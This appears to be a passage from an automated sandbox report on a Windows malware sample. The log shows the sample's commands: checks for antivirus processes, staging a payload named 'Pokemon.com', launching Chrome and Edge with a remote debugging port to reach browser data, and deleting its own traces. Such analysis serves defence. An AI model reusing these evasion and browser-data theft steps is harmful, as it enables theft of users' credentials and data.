                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                Source: IEUAAIW47.12.dr, N7YMYCBSR.12.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: JA7cOAGHym.exeVirustotal: Detection: 40%
                Source: JA7cOAGHym.exeReversingLabs: Detection: 28%
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeFile read: C:\Users\user\Desktop\JA7cOAGHym.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\JA7cOAGHym.exe "C:\Users\user\Desktop\JA7cOAGHym.exe"
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Brisbane Brisbane.cmd & Brisbane.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208079
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Validation
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SAO" Offering
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Involve + ..\Iso + ..\Leo + ..\Viewpicture y
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Pokemon.com y
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2320,i,6168099794620049130,9093318800782108175,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2756 --field-trial-handle=2520,i,17626979648747034904,9426378667772117242,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2860 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6896 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\208079\Pokemon.com" & rd /s /q "C:\ProgramData\79RQ1VS0ZU3E" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Brisbane Brisbane.cmd & Brisbane.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208079Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ValidationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SAO" Offering Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Involve + ..\Iso + ..\Leo + ..\Viewpicture yJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Pokemon.com yJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\208079\Pokemon.com" & rd /s /q "C:\ProgramData\79RQ1VS0ZU3E" & exitJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2320,i,6168099794620049130,9093318800782108175,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2756 --field-trial-handle=2520,i,17626979648747034904,9426378667772117242,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2860 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6896 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: pcacli.dllJump to behavior
